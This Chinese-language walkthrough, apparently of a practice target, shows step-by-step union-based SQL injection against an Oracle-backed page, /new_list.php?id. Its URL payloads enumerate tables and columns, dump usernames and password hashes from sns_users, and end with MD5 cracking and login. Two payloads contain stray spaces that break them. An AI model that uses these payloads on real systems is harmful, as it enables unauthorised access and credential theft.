首先还是老样子来判断它是否存在sql注入
这里写and 1=2页面不正常说明存在sql注入
紧接着来判断列数
这里3的时候页面不正常说明只有两列
然后是回显点
/new_list.php?id=1 union select 'null','null' from dual
查询库名
/new_list.php?id=1 union select 'null',(select instance_name from V$INSTANCE) from dual
查询表名
/new_list.php?id=1 union select 'null',(select table_name from user_tables where rownum=1) from dual
再查看除了上边这个表之外别的表
/new_list.php?id=1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
查询列名
/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual
有可以用模糊查询
/new_list.php?id=1 union select 'null',(select column_name from user_tab_co lumns where table_name='sns_users' and rownum=1 and column_name like '%USE R%') from dual
再查看用户跟密码
/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'
查看除zhong和hu之外的数据
/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
然后再去网页找md5解密进行密码解密
然后返回登录页面进行登录就完成了
2162
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
